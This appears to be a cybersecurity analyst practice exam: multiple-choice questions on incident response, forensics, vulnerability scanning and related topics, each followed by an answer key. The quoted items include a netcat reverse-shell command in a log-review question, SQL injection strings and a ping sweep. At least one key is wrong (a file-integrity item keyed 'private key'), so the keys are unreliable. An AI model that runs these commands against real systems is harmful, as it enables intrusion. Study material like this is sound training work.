A company has recently experienced a data breach and has lost nearly 1 GB of personally identifiable information about its customers. You have been assigned as part of the incident response team to identify how the data was leaked from the network. Your team has conducted an extensive investigation, and so far, the only evidence of a large amount of data leaving the network is from the email server. One user has sent numerous large attachments out of the network to their personal email address. Upon closer inspection, those emails only contain pictures of that user's recent trip to Australia. What is the most likely explanation for how the data left the network? A. The data was encrypted and emailed to their spouse's email account B. The files were downloaded from home while connected to the corporate VPN C. Steganography was used to hide the leaked data inside the user's photos D. The data was hashed and then emailed to their personal email account

C

Barrett needs to verify settings on a macOS computer to ensure that the configuration he expects is currently set on the system. What type of file is commonly used to store configuration settings for a macOS system? A. .config files B. .profile files C. plists D. The registry

C

During the analysis of data as part of ongoing security monitoring activities, which of the following is NOT a good source of information to validate the results of an analyst's vulnerability scans of the network's domain controllers? A. SIEM systems B. Log files C. DMARC and DKIM D. Configuration management systems

C

The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant's security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems? A. Anti-virus software B. Log consolidation C. Intrusion prevention system D. Automated patch deployment

C

What SCAP component could be to create a checklist to be used by different security teams within an organization and then report results in a standardized fashion? A. CVE B. CCE C. XCCDF D. CPE

C

You are conducting static analysis of an application's source code and see the following: String query "SELECT * FROM courses WHERE courseID='" + request.getParameter("id") + "' AND certification='"+ = request.getParameter("certification")+"'"; If an attacker wanted to get a complete copy of the courses table and was able to substitute arbitrary strings for "id" and "certification", which of the following strings allow this to occur? A. certification = "cysa' OR '1'=='1" B. id = "1' OR '1'==1" and certification = "cysa' OR '1=='1" C. id = "1' OR '1'=='1" and certification = "cysa' OR '1'=='1" D. id = "1' OR '1'=='1"

C

You need to perform an architectural review and select a view that focuses on the technologies, settings, and configurations used within the architecture. Which of the following views should you select? A. Operational view B. Logical view C. Technical view D. Acquisition view

C

You suspect that your server has been the victim of a web-based attack. Which of the following ports would most likely be seen in the logs to indicate the attack's target? A. 3389 B. 21 C. 443 D. 389

C

Keith wants to validate the application file that he downloaded from the vendor of the application. Which of the following should he compare against the file to verify the integrity of the downloaded application? A. File size and file creation date B. Public key of the file C. MD5 or SHA1 hash digest of the file D. Private key of the file

D

Which of the following is NOT a part of the security incident validation effort? A. Scanning B. Patching C. Permissions D. Sanitization

D

You are conducting a forensic analysis of a hard disk and need to access a file that appears to have been deleted. Upon analysis, you have determined that the file's data fragments exist scattered across the unallocated and slack space of the drive. Which technique could you use to recover the data? A. Hashing B. Recovery C. Overwrite D. Carving

D

Which of the following are valid concerns when migrating to a serverless architecture? (SELECT THREE) A. Limited disaster recovery options B. Protection of endpoint security C. Dependency on the cloud service provider D. Management of physical servers E. Patching of the backend infrastructure F. Management of VPC offerings

ABC

Which of the following vulnerabilities can be prevented by using proper input validation? (Select ANY that apply) A. Cross-site scripting B. SQL injection C. Directory traversal D. XML injection

ABCD

You have just run the following commands on your Linux workstation: DionTraining:~ root# ls Names.txt DionTraining:~ root# more Names.txt DION DIon Dion dion DionTraining:~ root# grep -i DION Names.txt Which of the following options would be included as part of the output for the grep command issued? (Select ANY that apply) A. DIOn B. DIon C. DION D. dion E. Dion

ABCD

You identified a critical vulnerability in one of your organization's databases. You researched a solution, but it will require the server to be taken offline during the patch installation. You have received permission from the Change Advisory Board to implement this emergency change at 11 pm once everyone has left the office. It is now 3 pm; what action(s) should you take now to best prepare for implementing this evening's change? (SELECT ALL THAT APPLY) A. Validate the installation of the patch in a staging environment B. Document the change in the change management system C. Ensure all stakeholders are informed of the planned outage D. Identify any potential risks associated with installing the patch E. Take the opportunity to install a new feature pack that has been requested F. Take the server offline at 10 pm in preparation for the change

ABCD

Which of the following roles should be assigned to the incident response team? (SELECT FOUR) A. Human resources B. Accounting C. Public relations D. Management E. Facility maintenance F. Legal

ACDF

Which of the following will an adversary do during the reconnaissance phase of the Lockheed Martin kill chain? (SELECT THREE) A. Identify employees on Social Media networks B. Select backdoor implants and appropriate command and control mechanisms C. Discover servers facing the public internet D. Acquire or develop zero-day exploits E. Harvest email addresses F. Release of malware on USB drives

ACE

Which of the following technologies could be used to ensure that users who log in to a network are physically in the same building as the network they are attempting to authenticate on? (SELECT TWO) A. Geo-IP B. GPS location C. NAC D. Port security

BC

You are a cybersecurity analyst working for an accounting firm that manages the accounting for multiple smaller firms. You have successfully detected an APT operating in your company's network that appears to have been there for at least 8 months. In conducting a qualitative assessment of the impact, which of the following factors should be most prominently mentioned in your report to your firm's executives? (SELECT TWO) A. Downtime B. Economic C. Data integrity D. Detection time E. Recovery time

BC

What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise? (Select TWO) A. Patching B. Segmentation C. Disabling unused services D. NIDS

BC

You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server's backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (SELECT THREE) A. Require an alphanumeric passphrase for the application's default password B. Require two-factor authentication for access to the application C. Change the username and default password D. Rename the URL to a more obscure name E. Create an allow list for the specific IP blocks that use this application F. Conduct a penetration test against the organization's IP space

BCE

You have been asked to scan your company's website using the OWASP ZAP tool. When you perform the scan, you received the following warning:"The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Passwords may be stored in browsers and retrieved."You begin to investigate further by reviewing a portion of the HTML code from the website that is listed below: <form action="authenticate.php"> Enter your username: <BR> <input type="text" name="user" value="" autofocus><BR> Enter your Password: <BR> <input type="password" name="pass" value="". maxlength="32"><BR> <input type="submit" value="submit"> </form> Based on your analysis, which of the following actions should you take? A. You recommend that the system administrator disables SSL on the server and implements TLS instead B. This is a false positive and you should implement a scanner exception to ensure you don't receive this again during your next scan C. You tell the developer to review their code and implement a bug/code fix D. You recommend that the system administrator pushes out a GPO update to reconfigure the web browsers security settings

C

You have received a laptop from a user who recently left the company. You went to the terminal in the operating system and typed 'history' into the prompt and see the following: # for i in seq 255; ping -c 1 10.1.0.$i; done Which of the following best describes what actions were performed by this line of code? A. Sequentially sent 255 ping packets to every host on the subnet B. Attempted to conduct a SYN scan on the network C. Conducted a ping sweep of the subnet D. Conducted a sequential ICMP echo reply to the subnet

C

Which of the following will an adversary do during the final phase of the Lockheed Martin kill chain? (SELECT FOUR) A. Wait for a user to click on a malicious link B. Release of malicious email C. Modify data D. Lateral movement through the environment E. Privilege escalation F. Exfiltrate data

CDEF

A cybersecurity analyst conducts proactive threat hunting on a network by correlating and searching the Sysmon and Windows Event logs. The analyst uses the following query as part of their hunt: Query: "mimikatz" NOT "EventCode=4658" NOT "EventCode=4689" EventCode=10 | stats count by time, SourceImage, TargetImage, GrantedAccess Based on the query above, which of the following potential indicators of compromise is the threat hunter relying on? A. Data exfiltration B. Processor consumption C. Irregular peer-to-peer communication D. Unauthorized software

D

You work as the incident response team lead at Fail to Pass Systems. Sierra, a system administrator, believes an incident has occurred on the network and contacts the SOC. At 2:30 am, you are woken up by a phone call from the CEO of Fail to Pass stating an incident has occurred and that you need to solve this immediately. As you are getting dressed to drive into the office, your phone rings again. This time, the CIO starts asking you a lot of technical questions about the incident. The first you heard of this incident was 5 minutes ago from the CEO, so you don't have the answers to the CIO's questions, yet. Based on this scenario, which of the following issues needs to be documented in your lessons learned report once this incident is resolved? A. An established incident response form for all employees to use to collect data B. A robust method of incident detection C. An offline incident response jump bag or kit D. A call list/escalation list

D

You work for Dion Training as a physical security manager. You are concerned that the physical security at the entrance to the company is not sufficient. To increase your security, you are determined to prevent piggybacking. What technique should you implement first? A. Install CCTV to monitor the entrance B. Install an RFID badge reader at the entrance C. Require all employees to wear security badges when entering the building D. Install an access control vestibule at the entrance

D

Your organization requires the use of TLS or IPsec for all communications with an organization's network. Which of the following is this an example of? A. DLP B. Data in use C. Data at rest D. Data in transit

D

(This is a simulated performance-based question.) Review the network diagram provided. <Internet>->Router->Firewall Then, the Firewall connects to 3 zones: 1) DMZ: FTP Server 192.168.0.5 Web Server 192.168.0.6 Email Server 192.168.0.7 2) Intranet workstations: Sales 172.16.1.2 HR 172.16.1.3 IT 172.16.1.4 3) Data Center Backup 192.168.1.10 Confidential 192.168.1.11 Files 192.168.1.12 Which of the following ACL entries should be added to the firewall to allow only the Human Resources (HR) computer to have SMB access to the file server (Files)? (Note: The firewall in this network is using implicit deny to maintain a higher level of security. ACL entries are in the format of Source IP, Destination IP, Port Number, TCP/UDP, Allow/Deny.) A. 172.16.1.3, 192.168.1.12, 445, TCP, ALLOW B. 172.16.1.12/24, 192.168.1.3/24, 445, TCP, ALLOW C. 192.168.1.12, 172.16.1.3, 445, UDP, DENY D. 172.16.1.3, 192.168.1.12, ANY, TCP, ALLOW

A

Which of the following tools is NOT useful for monitoring memory usage in Linux? A. df B. top C. ps D. free

A

Which of the following tools is useful for capturing Windows memory data for forensic analysis? A. Memdump B. Wireshark C. dd d. Nessus

A

Which of the following tools would you use to audit a multi-cloud environment? A. ScoutSuite B. Prowler C. Pacu D. OpenVAS

A

A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company's security controls. Which DNS assessment technique would be classified as active? A. A zone transfer B. A whois query C. A DNS forward or reverse lookup D. Using maltego

A

A cybersecurity analyst is preparing to run a vulnerability scan on a dedicated Apache server that will be moved into a DMZ. Which of the following vulnerability scans is most likely to provide valuable information to the analyst? A. Web application vulnerability scan B. Database vulnerability scan C. Network vulnerability scan D. Port scan

A

A cybersecurity analyst is working at a college that wants to increase its network's security by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements? A. Active scanning engine installed on the enterprise console B. Combination of cloud-based and server-based scanning engines C. Passive scanning engine located at the core of the network infrastructure D. Combination of server-based and agent-based scanning engines

A

A cybersecurity analyst reviews the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search? A. Returns all web pages containing an email address affiliated with diontraining.com B. Returns all web pages hosted at diontraining.com C. Returns all web pages containing the text diontraining.com D. Returns no useful results for an attacker

A

A forensics team follows documented procedures while investigating a data breach. The team is currently in the first phase of its investigation. Which of the following processes would they perform during this phase? A. Secure the scene to prevent contamination of evidence B. Make a copy of the evidence C. Create a report of the methods and tools used D. Document and prove the integrity of evidence

A

A vulnerability scanner has reported that a vulnerability exists in the system. Upon validating the report, the analyst determines that this reported vulnerability does NOT exist on the system. What is the proper term for this situation? A. False positive B. False negative C. True positive D. True negative

A

An analyst just completed a port scan and received the following results of open ports: Nmap scan report for dion_server (192.168.1.10) Host is up (0.132452s latency) Not shown: 994 closed ports PORT/STATE: 80/TCP OPEN 110/TCP OPEN 443/TCP OPEN 1433/TCP OPEN 3306/TCP OPEN 3389/TCP OPEN Based on these scan results, which of the following services are NOT currently operating? A. SSH B. Database C. RDP D. Web

A

An attacker has compromised a virtualized server. You are conducting forensic analysis as part of the recovery effort but found that the attacker deleted a virtual machine image as part of their malicious activity. Which of the following challenges do you now have to overcome as part of the recovery and remediation efforts? A. The attack widely fragmented the image across the host file system B. You will need to roll back to an early snapshot and then merge any checkpoints to the main image C. File formats used by some hypervisors cannot be analyzed with traditional forensic tools D. All log files are stored within the VM disk image, therefore, they are lost

A

Consider the following data: "id": "bundle--cf20f99b-3ed2-4a9f-b4f1-d660a7fc8241", "objects":[ "aliases": [. "Comment Crew", "Comment Group", "Shady Rat" "created" : "2015-05-15T09:00:00.000Z", "description":"APT1 is a single organization of operators that has conducted a cyber espionage campaign against a broad range of victims since at least 2006.", "first seen" : "2006-06-01T00:00:00.0002", "id": "intrusion-set--da1065ce-972c-4605-8755-9cd1074e3b5a", "modified" : "2015-05-15T09:00:00.000Z", "name": "APT1", "object_marking_refs": [ "marking-definition--3444e29e-2aa6-46f7-a01c-1c174820fa67" ), "primary_motivation": "organizational-gain", "resource level": "government", "spec version": "2.1", "type": "intrusion-set" My "aliases": [ "Greenfield", "JackWang", "Wang Dong" Which of the following best describes the data presented above? A. A JSON excerpt that describes an APT using the Structured Threat Information eXpression (STIX) format B. An XML entry describing an APT using the MITRE ATT&CK framework C. A JSON excerpt describing a REST API call to a Trusted Automated eXchange of Indicator Information (TAXII) service D. An XML entry describing an APT using the Structured Threat Information eXpression (STIX) framework

A

David noticed that port 3389 was open on one of the POS terminals in a store during a scheduled PCI compliance scan. Based on the scan results, what service should he expect to find enabled on this terminal? A. RDP B. IMAP C. MySQL D. LDAP

A

Dion Consulting Group has just won a contract to provide updates to an employee payroll system originally written years ago in C++. During your assessment of the source code, you notice the command "strcpy" is being used in the application. Which of the following provides is cause for concern, and what mitigation would you recommend to overcome it? A. strcpy could allow a buffer overflow to occur; upgrade the operating system to run ASLR to prevent a buffer overflow B. strcpy could allow a buffer overflow to occur; you should rewrite the entire system in Java C. strcpy could allow an integer overflow to occur; upgrade the operating system to run ASLR to prevent a buffer overflow D. strcpy could allow an integer overflow to occur; you should rewrite the entire system in Java

A

Dion Consulting Group has recently been awarded a contract to provide cybersecurity services for a major hospital chain in 48 cities across the United States. Previously, the consultants have won numerous contracts with financial services and publicly traded companies, but they are new to the healthcare industry. Which of the following laws must the consultants review to ensure the hospital and its customers are fully protected? A. HIPAA B. GLBA C. SOX D. COSO

A

Dion Consulting Group has recently been awarded a contract to provide cybersecurity services for a major hospital chain in 48 cities across the United States. You are conducting a vulnerability scan of the hospital's enterprise network when you detect several devices that could be vulnerable to a buffer overflow attack. Upon further investigation, you determine that these devices are PLCs used to control the hospital's elevators. Unfortunately, there is not an update available from the elevator manufacturer for these devices. Which of the following mitigations do you recommend? A. Recommend isolation of the elevator control system from the rest of the production network through the change control process B. Recommend immediate disconnection of the elevator's control system from the enterprise network C. Recommend immediate replacement of the PLCs with ones that are not vulnerable to this type of attack D. Conduct a penetration test of the elevator control system to prove that the possibility of this kind of attack exists

A

Dion Training wants to get an external attacker's perspective on its security status. Which of the following services should they purchase? A. Penetration test B. Patch management C. Asset management D. Vulnerability scan

A

Dion Training wants to require students to log on using multifactor authentication to increase the security of the authorization and authentication process. Currently, students log in to diontraining.com using a username and password. What proposed solution would best meet the goal of enabling multifactor authentication for the student login process? A. Require students to enter a unique six-digit number that is sent to them by SMS after entering their username and password B. Require students to enter a cognitive password requirement (such as 'What is your dog's name?') C. Require students to create a unique pin that is entered after their username and password are accepted D. Require students to choose an image to serve as a secondary password after logon

A

Due to new regulations, your organization's CIO has the information security team institute a vulnerability management program. What framework would BEST support this program's establishment? A. NIST B. SANS C. OWASP D. SDLC

A

During a security audit, you discovered that customer service employees have been sending unencrypted confidential information to their personal email accounts via email. What technology could you employ to detect these occurrences in the future and send an automated alert to the security team? A. DLP B. MDM C. SSL D. UTM

A

During a vulnerability scan, you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on this information, which of the following do you suspect is true? A. You are scanning a CDN-hosted copy of the site B. The scan will not produce any useful information C. The server assumes you are conducting a DDoS attack D. Nothing can be determined about this site with the information provided

A

During an assessment of the POS terminals that accept credit cards, a cybersecurity analyst notices a recent Windows operating system vulnerability exists on every terminal. Since these systems are all embedded and require a manufacturer update, the analyst cannot install Microsoft's regular patch. Which of the following options would be best to ensure the system remains protected and are compliant with the rules outlined by the PCI DSS? A. Identify, implement, and document compensating controls B. Replace the Windows POS terminals with standard Windows systems C. Remove the POS terminals from the network until the vendor releases a patch D. Build a custom OS image that includes the patch

A

In 2014, Apple's implementation of SSL had a severe vulnerability that, when exploited, allowed an attacker to gain a privileged network position that would allow them to capture or modify data in an SSL/TLS session. This was caused by poor programming in which a failed check of the connection would exit the function too early. Based on this description, what is this an example of? A. Improper error handling B. Insufficient logging and monitoring C. Use of insecure functions D. Insecure object reference

A

John is a cybersecurity consultant that wants to sell his services to an organization. In preparation for his first meeting with the client, John wants to conduct a vulnerability scan of their network to show the client how much they need his services. What is the most significant issue with John conducting this scan of the organization's network? A. John does not have permission to perform the scan B. The client's infrastructure design is unknown to John C. The IP range of the client systems is unknown by John D. John does not know what operating systems and applications are in use

A

Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend? A. Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability B. Remediate the vulnerability immediately C. Delay the remediation until the next major update of the SQL server occurs D. Wait until the next scheduled maintenance window to remediate the vulnerability

A

Judith is conducting a vulnerability scan of her data center. She notices that a management interface for a virtualization platform is exposed to her vulnerability scanner. Which of the following networks should the hypervisor's management interface be exposed to ensure the best security of the virtualization platform? A. Management network B. Internal zone C. External zone D. Screened subnet

A

Lamont is in the process of debugging a software program. As he examines the code, he discovers that it is miswritten. Due to the error, the code does not validate a variable's size before allowing the information to be written into memory. Based on Lamont's discovery, what type of attack might occur? A. Buffer overflow B. Cross-site scripting C. SQL injection D. Malicious logic

A

Nicole's organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role? A. MSSP B. PaaS C. IaaS D. SaaS

A

Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long text strings and then began using the sudo command to carry out actions. What type of attack has just taken place? A. Privilege escalation B. Phishing C. Session hijacking D. Social engineering

A

Sagar is planning to patch a production system to correct a detected vulnerability during his most recent network vulnerability scan. What process should he follow to minimize the risk of a system failure while patching this vulnerability? A. Deploy the patch in a sandbox environment to test it before patching the production system B. Wait 60 days to deploy the patch to ensure there are no associated bugs reported with it C. Deploy the patch immediately on the production system to remediate the vulnerability D. Contact the vendor to determine a safe time frame for deploying the patch into the production environment

A

Syed is developing a vulnerability scanner program for a large network of sensors to monitor his company's transcontinental oil pipeline. What type of network is this? A. SCADA B. SoC C. BAS D. CAN

A

What command should a forensic analyst use to make a forensic disk image of a hard drive? A. dd B. rm C. touch D. wget

A

What information should be recorded on a chain of custody form during a forensic investigation? A. Any individual who worked with evidence during the investigation B. The law enforcement agent who was first on the scene C. The list of individuals who made contact with files leading to the investigation D. The list of former owners/operators of the workstation involved in the investigation

A

What is the lowest layer (bottom layer) of a bare-metal virtualization environment? A. Physical hardware B. Host operating system C. Guest operating system D. Hypervisor

A

What is the utilization of insights gained from threat research and threat modeling to proactively discover evidence of an adversarial TTP within a network or system called? A. Threat hunting B. Penetration testing C. Incident response D. Information assurance

A

What sanitization technique uses only logical techniques to remove data, such as overwriting a hard drive with a random series of ones and zeroes? A. Clear B. Degauss C. Purge D. Destroy

A

What technique is an attacker using if they are reviewing data and publicly available information to gather intelligence about the target organization without scanning or other technical information gathering activities? A. Passive reconnaissance B. Active scanning C. Vulnerability scanning D. Patch management

A

What type of system allows attackers to believe they have succeeded with their attack, thus providing defenders with information about their attack methods and tools? A. honeypot B. sinkhole C. crackpot D. darknet

A

Which of the following BEST describes when a third-party takes components produced by a legitimate manufacturer and assembles an unauthorized replica sold in the general marketplace? A. Counterfeiting B. Capitalism C. Recycling D. Entrepreneurship

A

Which of the following actions is not a common activity during the recovery phase of an incident response process? A. Reviewing accounts and adding new privileges B. Validating that only authorized user accounts are on the systems C. Verifying that all systems are logging properly D. Performing vulnerability scans of all systems

A

Which of the following is NOT a means of improving data validation and trust? A. Decrypting data at rest B. Using MD5 checksums for files C. Encrypting data in transit D. Implementing Tripwire

A

Which of the following is a senior role with the ultimate responsibility for maintaining confidentiality, integrity, and availability in a system? A. Data owner B. Data steward C. Privacy officer D. Data custodian

A

Which of the following is not normally part of an endpoint security suite? A. VPN B. IPS C. Software firewall D. Anti-virus

A

Which of the following is the default nmap scan type when you do not provide a flag when issuing the command? A. TCP SYN scan B. TCP FIN scan C. TCP connect scan D. UDP scan

A

Which of the following is the leading cause for cross-site scripting, SQL injection, and XML injection attacks? A. Faulty input validation B. File inclusions C. Directory traversals D. Output encoding

A

Which of the following is typically used to secure the CAN bus in a vehicular network? A. Airgap B. Anti-virus C. Endpoint protection D. UEBA

A

Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, how it was remediated, the effectiveness of the incident response, and any identified gaps that might require improvement? A. Lessons learned report B. Forensic analysis report C. Trends analysis report D. Chain of custody report

A

Which of the following physical security controls would be the most effective in preventing an attacker from driving a vehicle through the glass doors at the front of the organization's headquarters? A. Bollards B. Access control vestibule C. Intrusion alarm D. Security guards

A

Which of the following programs was designed to secure the manufacturing infrastructure for information technology vendors providing hardware to the military? A. Trusted Foundry (TF) B. Supply Secure (SS) C. Trusted Access Program (TAP) D. Supplies Assured (SA)

A

Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices? A. SNMP B. SMTP C. MIB D. NetFlow

A

Which of the following tools cannot be used to make a forensic disk image? A. xcopy B. FTK C. dd D. EnCase

A

Which of the following tools could be used to detect unexpected output from an application being managed or monitored? A. behavior-based analysis tool B. log analysis tool C. Manual analysis D. signature-based detection tool

A

Which of the following types of attackers are sophisticated and highly organized people or teams typically sponsored by a nation-state? A. Advanced Persistent Threat B. Hacktivists C. Ethical hacker D. Script kiddies

A

Which of the following types of information is protected by rules in the United States that specify the minimum frequency of vulnerability scanning required for devices that process it? A. Credit card data B. Medical records C. Insurance records D. Driver's license numbers

A

Which of the following utilizes a well-written set of carefully developed and tested scripts to orchestrate runbooks and generate consistent server builds across an enterprise? A. Infrastructure as Code (IaC) B. Software-Defined Networking (SDN) C. Infrastructure as a Service (IaaS) D. Software as a Service (SaaS)

A

Which party in a federation provides services to members of the federation? A. RP B. SAML C. SSO D. IdP

A

Which role validates the user's identity when using SAML for authentication? A. IdP B. SP C. RP D. User agent

A

Which software development model emphasizes individuals and interactions over processes and tools, customer collaboration over contract negotiation, and working software over comprehensive documentation? A. Agile B. Spiral C. Waterfall D. RAD

A

Which type of threat actor can accidentally or inadvertently cause a security incident in your organization? A. Insider threat B. Hacktivist C. APT D. Organized Crime

A

Which type of threat will patches NOT effectively combat as a security control? A. Zero-day attacks B. Known vulnerabilities C. Discovered software bugs D. Malware with defined indicators of compromise

A

While conducting a security test to ensure that information about your company's web server is protected from inadvertent disclosure, you request an HTML file from the webserver and receive the following output: HTTP/1.1 404 Object Not Found Server: Microsoft-IIS/6.0 Date: Tuesday, 5 Sep 2017 1034:12 GMT Content-Type: text/html Content-Length: 132 There is no website configured at this address. This page is a placeholder until construction begins. Which of the following actions should you take to remediate this vulnerability? A. Set "RemoveServerHeader" to 1 in the URLScan.ini configuration file B. Set "VerifyNormalization" to 1 in the URLScan.ini configuration file C. Set "PerProcessLogging" to 1 in the URLScan.ini configuration file D. Set "EnableLogging" to 1 in the URLScan.ini configuration file

A

While performing a vulnerability scan, Christina discovered an administrative interface to a storage system is exposed to the internet. She looks through the firewall logs and attempts to determine whether any access attempts have occurred from external sources. Which of the following IP addresses in the firewall logs would indicate a connection attempt from an external source? A. 192.186.1.100 B. 172.16.1.100 C. 192.168.1.100 D. 10.15.1.100

A

William would like to use full-disk encryption on his laptop. He is worried about slow performance, though, so he has requested that the laptop have an onboard hardware-based cryptographic processor. Based on this requirement, what should William ensure the laptop contains? A. TPM B. AES C. PAM D. FDE

A

You are a security investigator at a high-security installation that houses significant amounts of valuable intellectual property. You are investigating the utilization of George's credentials and are trying to determine if his credentials were compromised or if he is an insider threat. In the break room, you overhear George telling a coworker that he believes he is the target of an ongoing investigation. Which of the following step in the preparation phase of the incident response was likely missed? A. Development of a communication plan B. Conduct background screenings on all applicants C. Developing a proper incident response form D. Creating a call list or escalation list

A

You are an analyst and have been asked to review and categorize the following output from a packet analysis in Wireshark: Source Destination Protocol Length Info 192.168.3.145 4.4.2.2 DNS 74 *1 4.4.2.2 192.168.3.145 DNS 90 *2 192.168.3.145 173.12.15.23 TCP 78 *3 173.12.15.23 192.168.3.145 TCP 78 *4 192.168.3.145 192.168.3.255 NBNS 92 *5 34.250.23.14 192.168.3.145 TCP 60 *6 34.250.23.14 192.168.3.145 TCP 60 *7 *1 - Standard query Oxaed A test.diontraining.com *2 - Standard query_response 0x3 aed A test.diontraining.com A 173.12.15.23 *3 - 48134 -80 [SYN] seq=0 Win=65635 Len=0 MSS=1426 WS=16 TSVal=486234134 Tsecr=0 SACK PERM=1 *4 - 80-48134 [SYNACK] seq=0 Ack=1 Win=65535 Len=0 MSS=1426 WS=4 TSVal=0 Tsecr=0 SACK PERM=1 al=486234134 Tsecr=240612 *5 - Namequery NB WORKGROUP *6 - 443 - 48134 (RST] Seq=1 Win=0 Len=0 *7 - 8080 - 48134 [RST] Seq=1 Win=0 Len=0 Based on your review, what does this scan indicate? A. This appears to be normal network traffic B. 173.12.15.23 might be infected and beaconing to a C2 server C. 192.168.3.145 might be infected with malware D. 173.12.15.23 might be infected with malware E. 192.168.3.145 might be infected and beaconing to a C2 server

A

You are attempting to prioritize your vulnerability scans based on the data's criticality. This will be determined by the asset value of the data contained in each system. Which of the following would be the most appropriate metric to use in this prioritization? A. The type of data processed by the system B. The cost of acquisition of the system C. The cost of hardware replacement of the system D. The depreciated hardware cost of the system

A

You are conducting an incident response and have already eradicated the malware from a victimized system. Which of the following actions should you perform as part of the recovery phase? A. Setting permissions B. Sanitization C. Reimaging D. Secure disposal

A

You are conducting an incident response and have traced the attack source to some compromised user credentials. After performing log analysis, you discover that the attack was successfully authenticated from an unauthorized foreign country. Your management is now asking for you to implement a solution to help mitigate this type of attack from occurring again. Which of the following should you implement? A. Context-based authentication B. Single sign-on C. Self-service password reset D. Password complexity

A

You are developing your vulnerability scanning plan and attempting to scope your scans properly. You have decided to focus on the criticality of a system to the organization's operations when prioritizing the system in the scope of your scans. Which of the following would be the best place to gather the criticality of a system? A. Review the asset inventory and BCP B. Ask the CEO for a list of the critical systems C. Conduct a nmap scan of the network to determine the OS of each system D. Scope the scan based on IP subnets

A

You are going to perform a forensic disk image of a macOS laptop. What type of hard drive format should you expect to encounter? A. HFS+ B. exFAT C. FAT32 D. NTFS

A

You are troubleshooting a network connectivity issue and need to determine the packet's flow path from your system to the remote server. Which of the following tools would best help you identify the path between the two systems? A. tracert B. nbtstat C. ipconfig D. netstat

A

You are working as a cybersecurity analyst, and you just received a report that many of your servers are experiencing slow response times due to what appears to be a DDoS attack. Which of the following actions should you undertake? A. Inform management of the issue being experienced B. Shutdown all of the interfaces on the affected servers C. Take no action but continue to monitor the critical systems D. Inform users regarding the affected systems

A

You are working as a network administrator for Dion Training. The company has decided to allow employees to connect their devices to the corporate wireless network under a new BYOD policy. You have been asked to separate the corporate network into an administrative network (for corporate-owned devices) and an untrusted network (for employee-owned devices). Which of the following technologies should you implement to achieve this goal? A. VLAN B. MAC filtering C. VPN D. WPA2

A

You have been tasked to create some baseline system images to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry-standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability scanner option would BEST create the process requirements to meet the industry-standard benchmarks? A. Utilizing an operating system SCAP plugin B. Utilizing a non-credential scan C. Utilizing a known malware plugin D. Utilizing an authorized credential scan

A

You have evidence to believe that an attacker was scanning your network from an IP address at 172.16.1.224. This network is part of a /26 subnet. You wish to quickly filter through several logs using a REGEX for anything that came from that subnet. What REGEX expression would provide the appropriate output when searching the logs for any traffic originating from only IP addresses within that subnet? A. \b172\.16\.1\.(25[0-5]|2[0-4][0-9]|19[2-9])\b B. \b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0- 5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b C. \b172\.16\.1\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b D. \b172\.16\.1\.(25[0-5]|2[0-4][0-9]?)\b

A

You have just begun an investigation by reviewing the security logs. During the log review, you notice the following lines of code: sc config schedule start auto net start schedule at 10:42_""c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe"" What BEST describes what is occurring and what action do you recommend to stop it? A. The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network B. The host (123.12.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; No recommendation is required since this is not malicious activity C. The host (123.12.34.12) is a rogue device on the network; you should recommend removing the host from the network D. The host is beaconing to 123.12.34.12 every day at 10:42 by running nc.exe from the temp directory; you should recommend removing the host from the network

A

You have recently been hired as a security analyst at Dion Training. On your first day, your supervisor begins to explain the way their network is configured, showing you the physical and logical placement of each firewall, IDS sensor, host-based IPS installations, the networked spam filter, and the DMZ. What best describes how these various devices are placed into the network for the highest level of security? A. Defense in depth B. Load balancer C. Network segmentation D. UTM

A

You were conducting a forensic analysis of an iPad backup and discovered that only some of the information is within the backup file. Which of the following best explains why some of the data is missing? A. The backup is a differential backup B. The backup was interrupted C. The backup is encrypted D. The backup is stored in iCloud.

A

Your company explicitly obtains permission from its customers to use their email address as an account identifier in its CRM. Max, who works at the marketing department in the company's German headquarters, just emailed all their customers to let them know about a new sales promotion this weekend. Which of the following privacy violations has occurred, if any? A. There was a privacy violation since the customers explicitly gave permission to use the email address as an identifier and did not consent to receive marketing emails B. There was no privacy violation because only corporate employees had access to their email addresses C. There was no privacy violation since the customers were emailed securely through the customer relationship management tool D. There was a privacy violation since data minimization policies were not followed properly

A

